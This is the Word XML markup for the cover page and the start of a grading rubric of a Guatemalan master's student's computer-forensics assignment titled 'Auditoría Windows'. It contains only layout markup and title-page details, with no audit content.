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2C6D" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="402"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-PE" w:bidi="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-PE" w:bidi="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62977151" wp14:editId="66E32936">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>488315</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>90805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1237615" cy="1200785"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2046160855" name="Picture 2" descr="A logo with a person in the b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60855" name="Picture 2" descr="A logo with a person in the ba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bookmark7"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="142E00A8" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A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sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-PE" w:bidi="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-PE" w:bidi="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIVERSIDAD MARIANO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-PE" w:bidi="es-PE"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DBE335" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A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sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-PE" w:bidi="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-PE" w:bidi="es-PE"/>
        </w:rPr>
        <w:t>GÁLVEZ DE GUATEMALA</w:t>
      </w:r>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-PE" w:bidi="es-PE"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A83F3E" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:right="39" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028F294F" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="39" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>FACULTAD DE INGENIERÍA EN SISTEMAS DE INFORMACIÓN</w:t>
      </w:r>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493071DF" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="39" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="628D5E5D" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="5" w:line="248" w:lineRule="auto"/>
        <w:ind w:right="30" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>MAESTRÍA EN ANÁLISIS FORENSE INFORMÁTICO</w:t>
      </w:r>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A0B45" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="5" w:line="248" w:lineRule="auto"/>
        <w:ind w:right="30" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="533F4F13" w14:textId="0A14B150" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="004C57E2" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="5" w:line="248" w:lineRule="auto"/>
        <w:ind w:right="30" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE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es-PE"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00E525A2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">AREA NO. </w:t>
      </w:r>
      <w:r w:rsidR="00795AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509D127" w14:textId="173B508B" w:rsidR="00E525A2" w:rsidRDefault="00795AC4" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-PE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es-PE"/>
        </w:rPr>
        <w:t>AUDITORÍA WINDOWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A23DFE" w14:textId="77777777" w:rsidR="002C1567" w:rsidRDefault="002C1567" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAD5CBE" w14:textId="77777777" w:rsidR="00E525A2" w:rsidRDefault="00E525A2" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79510850" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798EBC9A" w14:textId="45D82936" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00382218">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="10" w:right="38" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Autor: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95078B" w14:textId="77777777" w:rsidR="007006E6" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="10" w:right="38" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Brandon Eduardo Godinez Suret </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B889EBB" w14:textId="77777777" w:rsidR="007006E6" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="10" w:right="38" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">2693-18-7504 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43667344" w14:textId="4E6819A2" w:rsidR="00273A1A" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="10" w:right="38" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007006E6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>bgodinezs1@miumg.edu.gt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF31DB0" w14:textId="77777777" w:rsidR="007006E6" w:rsidRPr="00D656E9" w:rsidRDefault="007006E6" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="10" w:right="38" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C60C4E1" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4665"/>
        </w:tabs>
        <w:spacing w:after="5"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="376DC906" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="34" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Profesor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5CA7E" w14:textId="3A723174" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00E525A2" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="33" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pP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es-PE"/>
        </w:rPr>
        <w:t>MSc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es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004C57E2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Ing.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es-PE"/>
        </w:rPr>
        <w:t>Déner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es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medrano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5F90D" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7B3935" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6020D2" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="38" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>Curso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D7DB81" w14:textId="27FEF5E1" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00E525A2" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="5" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="30" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE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es-PE"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00573A4F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>uditoría Informática</w:t>
      </w:r>
      <w:r w:rsidR="00273A1A" w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00573A4F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00273A1A" w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 2,025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C94B8" w14:textId="77777777" w:rsidR="00273A1A" w:rsidRPr="00D656E9" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="21"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B21ACD" w14:textId="3E51DC14" w:rsidR="00273A1A" w:rsidRDefault="00273A1A" w:rsidP="00273A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="37" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Guatemala </w:t>
      </w:r>
      <w:r w:rsidR="00D83D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="00D83D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>noviembre</w:t>
      </w:r>
      <w:r w:rsidRPr="00D656E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2025  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076293DE" w14:textId="43423557" w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w:rsidRDefault="00E47FFC" w:rsidP="00E47FFC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6AEB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rúbrica, calificación y firma electrónica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF6D95" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w:rsidRDefault="00E47FFC" w:rsidP="00E47FFC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FABE757" w14:textId="77777777" w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w:rsidRDefault="00E47FFC" w:rsidP="00E47FFC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto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FFC" w:rsidRPr="002E6AEB" w14:paraId="57766E3B" w14:textId="77777777" w:rsidTr="00D81CE1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="50D6B1F9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 w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E6AEB">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Rúbrica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w14:paraId="6D43078C" w14:textId="77777777" w:rsidTr="00D81CE1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="756F9FED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100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="565746C6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Excelente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E47FFC" w:rsidRPr="002E6AEB" w14:paraId="55055BB8" w14:textId="77777777" w:rsidTr="00D81CE1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F857C19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80%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
